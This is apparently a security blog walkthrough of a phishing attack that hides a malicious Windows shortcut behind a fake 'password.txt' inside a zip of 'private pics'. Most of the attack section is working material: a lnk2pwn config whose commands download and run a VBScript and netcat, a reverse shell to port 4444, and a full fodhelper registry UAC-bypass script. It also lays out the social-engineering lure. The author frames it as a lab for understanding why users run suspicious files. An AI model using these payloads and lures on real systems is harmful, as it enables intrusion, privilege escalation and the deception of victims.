Pwned by a Shortcut

No, this is not about some fancy exploit.

This is about an old and known trick that combines a few basic techniques and a lot of social engineering that's still getting users pwned by their curiosity (or whatever else).

The Context

A few weeks ago I had to recover some information about an old Microsoft “hotmail” account that I have. As I logged in to the email account I saw a huge number of emails from phishing campaigns that I was receiving.

I started looking at some of those emails trying to find some fancy stuff but all I got was fake websites (pretty badly written) and attached pdf, doc, and even zipped vbs files.

That got me thinking: Why would someone download and execute a really suspicious file from a really suspicious email?

So, I decided to write some form of “malware” on my own to understand why people are still hitting the “Run” button on suspicious files and also to convince myself that it’s not that hard to make someone execute your payload.

The Environment

The environment to reproduce this lab:

• Linux (Host)

• Python 2.7

• wine

• Windows 10 (Guest — VMWare, VirtualBox, etc.)

Round 1: The “Naive Plan”

At first glance, I thought about delivering a “fake .jpg” file. There are tons of tutorials about that.

The idea is pretty simple:

• Generate a reverse shell payload with msfvenom.

• Change the .exe icon to a “visually appealing” image.

• Apply Right to Left Override to the file name.

• Try some evasion tools (shellter, veil-evasion, etc.).

• Compress and deliver.

That failed miserably!

Windows Defender/SmartScreen caught 100% of all tries.

Round 2: Fighting Windows Defender/SmartScreen

If you already tried to drop some reverse shell payloads (.exe) on Windows 10 I guess you noticed that is not that trivial.

One of the things that the anti-phishing/malware component does is validate the code signing certificate. Basically, if your application does not have a valid certificate or a good “reputation” a big warning will show up every time that you try to execute it:

Although the user can still hit the “Run Anyway” button, that warning is enough to stop your payload from being executed by a “regular” user.

As described in the article “Hijacking Digital Signatures” from pentestlab.blog, you may have to put in some effort in order to bypass the SmartScreen without buying a certificate.

Round 3: Hello VBScript, My Old Friend

If it is not that trivial to drop a PE, is there anything else that could be simpler?

Yes, VBScript!

It may seem outdated and discontinued, but yet, Windows is still running VBScript smoothly.

Running a VBScript file does not make a lot of “noise” compared to an executable:

But, delivering a .vbs file sounds pretty bad. What else could be done?

Round 4: Shortcuts

One thing that could possibly get close to “legit” and convince someone to execute it is a shortcut file. Shortcut files in Windows do not show the “.lnk” file extension even when the “Hide extensions for known file types” folder viewing property is unchecked.

With that in mind, we could work on social engineering and deliver a malicious shortcut to the victim.

Round 5: Preparing the Attack

I wrote a small CLI tool called lnk2pwn to make the process of generating malicious shortcuts easier and I’m going to be using this tool to prepare the attack:

git clone https://github.com/tommelo/lnk2pwn

The CLI tool has a config.json file that represents a template of the attributes that will be generated in the shortcut. The tool also generates a VBScript to bypass the UAC.

To illustrate the attack that is going to be performed:

Configuring the commands and attributes for the shortcut:

{
    "shortcut": {
        "target_path": "C:\\Windows\\System32\\cmd.exe",
        "working_dir": "C:\\Windows\\System32",
        "arguments": "/c powershell.exe iwr -outf %tmp%\\p.vbs http://127.0.0.1/uac_bypass.vbs & %tmp%\\p.vbs",
        "icon_path": "C:\\Windows\\System32\\notepad.exe",
        "icon_index": null,
        "window_style": "MINIMIZED",
        "description": "TRUST ME",
        "fake_extension": ".txt",
        "file_name_prefix": "password"
    },

    "elevated_uac": {
        "file_name": "uac_bypass.vbs",
        "cmd": "cmd.exe /c powershell.exe -nop -w hidden iwr -outf C:\\Windows\\System32\\nc.exe http://127.0.0.1/nc.exe & C:\\Windows\\System32\\nc.exe 127.0.0.1 4444 -e cmd.exe"
    }
}

Basically, we are registering two commands to be executed on the user’s behalf:

cmd.exe /c powershell.exe iwr -outf %tmp%\\p.vbs http://127.0.0.1/uac_bypass.vbs & %tmp%\\p.vbs

When the user runs the shortcut file, a VBScript (uac_bypass.vbs) is downloaded and executed. The script contains our second command:

cmd.exe /c powershell.exe -nop -w hidden iwr -outf C:\\Windows\\System32\\nc.exe http://127.0.0.1/nc.exe & C:\\Windows\\System32\\nc.exe 127.0.0.1 4444 -e cmd.exe

This is going to be executed with administrative privileges without prompting the UAC screen.

Now, we just need to run the Python script to create the shortcut and the VBScript file:

python lnk2pwn.py -c config.json -o /var/www/html

As soon as the tool generates the .lnk and the .vbs files we are ready to deliver our fake shortcut.

Round 6: Social Engineering

The key point to this whole thing is social engineering. We need to put in some effort to convince someone to download and execute our “weird” file.

As an example, I could send a zipped file containing some “private pics” (password protected) and a “fake text” file containing the password to unzip those pictures:

zip --encrypt private_pics.zip pic1.jpg pic2.jpg

Also, we need to change the behavior of the generated VBScript to look “legit” and open up the notepad showing the password to unzip the content:

Const HKEY_CURRENT_USER = &H80000001

Const FodHelperPath           = "C:\\Windows\\System32\\fodhelper.exe"
Const RegKeyPathStr           = "SOFTWARE\\Classes\\ms-settings\\shell\\open\\command"
Const RegKeyPath              = "Software\\Classes\\ms-settings\\shell\\open\\command"
Const DelegateExecRegKeyName  = "DelegateExecute"
Const DelegateExecRegKeyValue = ""
Const DefaultRegKeyName       = ""
Const DefaultRegKeyValue      = "cmd.exe /c powershell.exe -nop -w hidden iwr -outf C:\Windows\System32\nc.exe http://127.0.0.1/nc.exe & C:\Windows\System32\nc.exe 127.0.0.1 4444 -e cmd.exe"

Const RegObjectPath = "winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv"
Set Registry = GetObject(RegObjectPath)

Registry.CreateKey HKEY_CURRENT_USER, RegKeyPath
Registry.SetStringValue HKEY_CURRENT_USER, RegKeyPathStr, DelegateExecRegKeyName, DelegateExecRegKeyValue
Registry.SetStringValue HKEY_CURRENT_USER, RegKeyPathStr, DefaultRegKeyName, DefaultRegKeyValue

Set Shell = WScript.CreateObject("WScript.Shell")
Shell.Run FodHelperPath, 0, False

'----------------------------------------------------
' Add to look legit!
'----------------------------------------------------
Set Notepad = WScript.CreateObject("WScript.Shell")
Notepad.Run "C:\\Windows\\System32\\notepad.exe"

WScript.Sleep 1000

Notepad.SendKeys "Password: secure"

Compressing the final package:

zip evil.zip private_pics.zip password.txt.lnk

Round 7: Pwned by a Shortcut

Well, I thought it would be better recording a POC instead of taking some screenshots:

References

Shortcuts as Entry Points for Malware. https://www.phrozen.io/page/shortcuts-as-entry-points-for-malware-part-3

Hijacking Digital Signatures. https://pentestlab.blog/2017/11/06/hijacking-digital-signatures/

Fileless UAC Bypass. https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/

Hackers Illegally Purchasing Abused Code-signing & SSL Certificates From Underground Market. https://gbhackers.com/abused-code-signing/

Microsoft SmartScreen. https://en.wikipedia.org/wiki/Microsoft_SmartScreen

.LNK File Extension. https://fileinfo.com/extension/lnk